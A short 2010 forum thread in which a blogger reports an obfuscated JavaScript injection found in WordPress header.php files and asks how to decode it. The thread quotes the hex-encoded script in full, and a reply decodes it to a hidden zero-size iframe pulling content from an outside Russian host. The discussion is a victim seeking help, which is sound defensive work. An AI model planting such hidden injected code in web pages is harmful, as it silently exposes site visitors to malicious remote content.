1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

javascript injection on header.php

Discussion in 'Blogging' started by stream, Jul 8, 2010.

  1. stream

    stream Registered Member

    Joined:
    Apr 7, 2009
    Messages:
    51
    Likes Received:
    4
    hey guys,

    i got an JS injection on some of my blogs.
    maybe my wp was too outdated and the attacker could inject the code. the injection reads like this:

    Code:
    <script type="text/javascript">var _0x260c=["\x3C\x69\x66\x72\x61\x6D\x65\x20\x73\x72\x63\x3D\x22\x68\x74\x74\x70\x3A\x2F\x2F\x61\x64\x32\x2E\x73\x70\x62\x2E\x72\x75\x2F\x73\x63\x72\x69\x70\x74\x2F\x69\x6E\x2E\x63\x67\x69\x3F\x64\x65\x66\x61\x75\x6C\x74\x22\x20\x77\x69\x64\x74\x68\x3D\x22\x30\x22\x20\x68\x65\x69\x67\x68\x74\x3D\x22\x30\x22\x20\x66\x72\x61\x6D\x65\x62\x6F\x72\x64\x65\x72\x3D\x22\x30\x22\x3E\x3C\x2F\x69\x66\x72\x61\x6D\x65\x3E","\x77\x72\x69\x74\x65"];document[_0x260c[0x1]](_0x260c[0x0]);</script>
    how can i decode it?
     
  2. yeahright

    yeahright Registered Member

    Joined:
    Jan 17, 2009
    Messages:
    93
    Likes Received:
    32
    It decodes to:
    HTML:
    <iframe src="http://ad2.spb.ru/script/in.cgi?default" width="0" height="0" frameborder="0"></iframe>
    Just use something like firebug for firefox or chrome's built in developer tools to see what the javascript outputs.
     
    • Thanks Thanks x 1
  3. stream

    stream Registered Member

    Joined:
    Apr 7, 2009
    Messages:
    51
    Likes Received:
    4
    thanks yeahright!